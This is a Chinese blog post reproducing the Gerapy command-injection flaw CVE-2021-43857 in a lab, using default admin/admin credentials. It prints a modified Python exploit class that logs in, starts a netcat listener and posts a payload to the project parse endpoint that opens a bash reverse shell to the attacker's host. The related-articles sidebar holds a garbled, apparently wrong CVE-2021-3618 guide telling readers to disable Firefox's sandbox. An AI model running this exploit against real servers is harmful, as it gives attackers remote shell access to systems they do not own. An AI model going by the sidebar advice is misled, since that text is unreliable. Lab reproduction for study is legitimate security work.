gerapy漏洞复现(CVE-2021-43857)

最新推荐文章于 2024-06-03 13:00:00 发布
最新推荐文章于 2024-06-03 13:00:00 发布
阅读量4.5k 收藏
点赞数 1
分类专栏: # vulfocus系列 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45778886/article/details/122332845
版权

简介

Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。

漏洞描述

该漏洞源于程序没有正确清理通过project/id/parse端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。

影响版本

Gerapy <= 0.9.8

代码分析

http://www.ctfiot.com/14043.html

漏洞复现

开启环境

在这里插入图片描述
弱口令:admin/admin进入后台,点击项目管理。
在这里插入图片描述
抓包
在这里插入图片描述

反弹shell

修改请求包,反弹shell。
在这里插入图片描述
在这里插入图片描述
反弹成功,我这里用frp做了一个代理。

工具

https://github.com/LongWayHomie/CVE-2021-43857

略改工具

class Exploit:

	def __init__(self, target_ip, target_port, localhost, localport):
		self.target_ip = target_ip
		self.target_port = target_port
		self.localhost = localhost
		self.localport = localport

	def exploitation(self):
		payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}"""

		#Login to t he app (getting auth token)
		url = "http://" + target_ip + ":" + target_port
		r = requests.Session()
		print("[*] Resolving URL...")
		r1 = r.get(url)
		time.sleep(3)
		print("[*] Logging in to application...")
		r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True)
		time.sleep(3)
		if (r2.status_code == 200):
			print('[*] Login successful! Proceeding...')
		else:
			print('[*] Something went wrong!')
			quit()

		#Create a header out of auth token (yep, it's bad as it looks)
		dict = json.loads(r2.text)
		temp_token = 'Token '
		temp_token2 = json.dumps(dict['token']).strip('"')
		auth_token = {}
		auth_token['Authorization'] = temp_token + temp_token2
		id = '1'
		print("[*] Found ID of the project: ", id)
		time.sleep(1)

		#netcat listener
		print("[*] Setting up a netcat listener")
		listener = subprocess.Popen(["nc", "-nvlp", self.localport])
		time.sleep(3)

		#exec the payload
		print("[*] Executing reverse shell payload")
		print("[*] Watchout for shell! :)")
		r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True)
		listener.wait()

		if (r5.status_code == 200):
			print("[*] It worked!")
			listener.wait()
		else:
			print("[!] Something went wrong!")
			listener.terminate()
echokp
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
subprocess.Popen()的使用
weixin_45314192的博客
03-06 1万+
subprocess模块主要用于创建子进程,并连接它们的输入、输出和错误管道,获取它们的返回状态。通俗地说就是通过这个模块,你可以在Python的代码里执行操作系统级别的命令,比如“ipconfig”、“du -sh”等等。subprocess模块替代了一些老的模块和函数,比如:`os.system,os.spawn,os.popen*` subprocess.Popen()的基本入参介绍 subprocess.Popen()(args, *, stdin=None, input=None, stdout
【vulhub系列】CVE-2021-4034 Polkit `pkexec` 权限提升漏洞
Wiofgb的博客
10-06 1923
【vulhub系列】CVE-2021-4034 Polkit `pkexec` 权限提升漏洞
渗透测试靶场练习——University
Aibne_的博客
05-27 544
渗透测试靶场练习——University
CVE-2021-32849 Gerapy远程命令执行漏洞
include_voidmain的博客
03-09 1192
CVE-2021-32849 Gerapy远程命令执行漏洞
Gerapy 远程命令执行(CVE-2021-32849)分析和
鸣蜩十四的博客
11-30 922
简介 Gerapy是一款基于Scrapy、Scrapyd、Django和Vue.js的分布式爬虫管理框架。 漏洞描述 该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入。攻击者可利用该漏洞执行任意命令。 影响版本 Gerapy <= 0.9.7 代码分析 此次漏洞产生于gerapy/server/core/views.py文件 关键代码 @api_view(['POST']) @permission_classes([IsAuthenticated]) def pr
漏洞预警:Gerapy clone 后台远程命令执行漏洞
热门推荐
weixin_43526443的博客
12-06 7万+
——D&X安全实验室 目录 Part1漏洞描述 Part2危害等级 Part3漏洞影响 Part4漏洞分析及验证 4.1 登录页面 4.2出漏洞的文件为 gerapy/server/core/views.py 4.3 从代码中可以看到 address参数可控,拼接到 cmd中使用 Popen命令执行,构造请求包 4.4 抓包,进行验证 Part5修建议 Part1 漏洞描述 Gerapy 是一款分布式爬虫管理框架,支持 Python3,基于 Scrapy、Scrapy..
python 中subprocess的Popen杀死子进程的方法
果冻先生的专栏
12-18 5443
需要首先了解shell=True和shell=False的区别和联系。 https://blog.csdn.net/xiaoyaozizai017/article/details/72794469 shell=True参数会让subprocess.call接受字符串类型的变量作为命令,并调用shell去执行这个字符串,当shell=False是,subprocess.call只接受数组变量作为...
是的,我写的开源项目被曝出了高危漏洞。。
静觅
12-30 4474
“ 阅读本文大概需要 3 分钟。 ”大家好,我是崔庆才。前几天看到了一个开源项目中的远程执行漏洞,开发者通过 HTTP 接口暴露了一个参数,接收参数之后,代码中将该参数拼接了一个命令,然后...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
检测通过“ proxylogon”组漏洞CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065)利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发
05-27
预认证SSRF,CVSS:3.0 9.1 / 8.4 CVE-2021-26857,不安全的反序列化导致特权升级到SYSTEM级别,CVSS:3.0 7.8 / 7.2 CVE-2021-26858,认证后文件写入, CVSS:3.0 7.8 / 7.2 CVE-2021-27065,认证后文件写入,CVSS...
Log4j2远程代码执行漏洞(cve-2021-44228)
citytwilight的博客
05-22 2668
Log4j2远程代码执行漏洞(cve-2021-44228)(反弹shell)
CVE-2021–26855与CVE-2021–27065漏洞分析及
hongduilanjun的博客
05-09 3939
文章首发先知社区:https://xz.aliyun.com/t/10098 前言 微软在上半年三月披露了关于Exchange邮件服务器CVE-2021–26855(SSRF)与CVE-2021–27065(任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关于该漏洞环境,重新想起这个事,正好暑假也没干啥正事,借此机会分析一下。 CVE-2021–26855 CVE-2021–26855是⼀个SSRF
Gerapy clone 后台远程命令执行漏洞CVE-2021-32849】
Armandhe的博客
11-29 2554
Gerapy clone 后台远程命令执行漏洞CVE-2021-32849】
漏洞CVE-2021-22205 GitLab 远程命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
11-05 2240
0x01 漏洞背景描述 2021年4⽉15⽇,GitLab官方发布安全补丁更新修了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提
Vue.js 客户端模板注入漏洞
jammny
01-29 9474
漏洞详情 由于程序员代码编写不当,将导致用户输入的数据,可以改变客户端模版的执行逻辑,从而造成XSS漏洞漏洞影响 漏洞分析 漏洞编写模板如下: const express = require('express'); const helmet = require('helmet'); const escapeHTML = require('escape-html'); const app = express(); app.use(helmet()); app.get('/', (req, re
家用厨房安全新篇章:煤气安全阀结构与校验知识普及
最新发布
BDjiance的博客
06-03 307
煤气安全阀作为防止煤气泄露的关键设备,其结构特点、作用解析、定期校验的重要性以及泄露风险的防范等方面,都是我们必须深入了解和掌握的知识。例如,某地一家庭因煤气管道老化导致泄露,而安全阀因长期未校验而失效,最终引发爆炸事故,造成人员伤亡和财产损失。此外,在选择安全阀时,应确保其符合国家标准和产品质量要求,避免因使用劣质产品而带来的安全风险。首先,安全阀能够在煤气压力超过设定值时自动关闭,防止因压力过高导致的煤气泄露和爆炸事故。最后,在使用完煤气设备后,应确保关闭阀门并定期检查安全阀的工作状态。
cve-2021-3618漏洞
02-06
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 在,你可以尝试CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果成功,可能会出安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出异常行为,可能是因为已经修了该漏洞或在你的环境中无法成功利用。 需要注意的是,CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施操作之前,请确认你已经了解并接受相关风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值